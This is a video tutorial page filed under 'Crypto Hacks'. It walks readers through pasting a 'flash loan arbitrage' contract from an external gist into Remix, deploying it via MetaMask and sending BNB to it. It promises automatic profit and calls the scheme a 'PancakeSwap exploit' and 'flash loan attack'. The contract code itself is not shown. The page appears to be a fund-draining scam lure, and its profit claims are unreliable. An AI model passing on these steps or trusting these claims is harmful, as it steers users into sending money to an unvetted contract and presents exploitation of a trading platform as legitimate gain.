Flash Loan Arbitrage BNB Crypto Tutorial | Flash Loan latest Smart Contract Code Jun 2022

Flash Loan Arbitrage BNB Crypto Tutorial | Flash Loan latest Smart Contract Code Jun 2022

83 View

Publish Date:
1 December, 2022
Category:
Crypto Hacks
Video License
Standard License
Imported From:
Youtube

use the PancakeSwap exploit.
Get Flash Loan Contract Code: https://gist.githubusercontent.com/shawnby/d894c204d1c63e320d21b1fb885aaa85/raw/ec0cae2f20d4b6492e5f1e0f26c4a3b246800ef8/Getflash%2520loan%2520arbitrage

Contract Deploy Site: https://remix.ethereum.org

You need to deposit at least 0.5 per 1000 borrowed for the contract to execute correctly.


The contract will create a new token and then initiate a flash loan to trade against the token. Within this same contract, the flash loan will be paid back and any profit remaining will be transferred to your wallet. This is called a flash loan arbitrage as it's looking for crypto arbitrage opportunities with the bnb coin.


To get started, you need to have MetaMask browser extension installed. https://metamask.io or google 'metamask' to ensure you land on the official site.
IF YOU HAVE METAMASK, SKIP TO 2:00 FOR CONTRACT

FULL INSTRUCTIONS
1. Download and setup the metamask browser wallet if you don't have it.
2. Make sure you have enough BNB to pay for the token creation and flash loan contract gas fees
a. The amount of BNB you want depends on how much of a loan you pull. It has to be a minimum of 0.5 for the contract to process fast enough. The higher the liquidity, the higher the profit.
3. Open remix.ethereum.org in your browser
4. Click on contract folder on the left and click New File
5. Name the file something like flashloan.sol
6. Copy and paste the contract code into the new file
7. Select the second tab on the left
8. Choose the compiler that matches the top of the code
9. Click on compile at the bottom
10. Once it is finished, go to the third tab on the left
11. Under environment, click on injected web3. This will connect to your metamask wallet so that you can interact.
12. Click on the arrow under deploy.
13. Enter the details for your new token. For the loan amount choose anything from 1000 and up. This needs to be in line with whatever liquidity you decide to deposit so it's usually 0.5 per 1000 bnb borrowed.

14. Click transact and then confirm the gas fees to launch the token in metamask.
15. Under deployed contracts, copy the new token contract code.
16. Go to your metamask or any wallet and send the liquidity to the new contract code.

*** RECOMMENDATION: Because of the high volume of flash loan attack on binance smart chain Always start with 0.5 BNB then for your next profit increase the amount of liquidity***

17. Wait until the transaction is confirmed on the blockchain
18. Once that is finished, click the arrow and click the red Action button and confirm the gas fees to execute the flash loan attack.
19. That's it! The flash loan will be paid back automatically and any profit will be returned to your wallet in a few seconds/minutes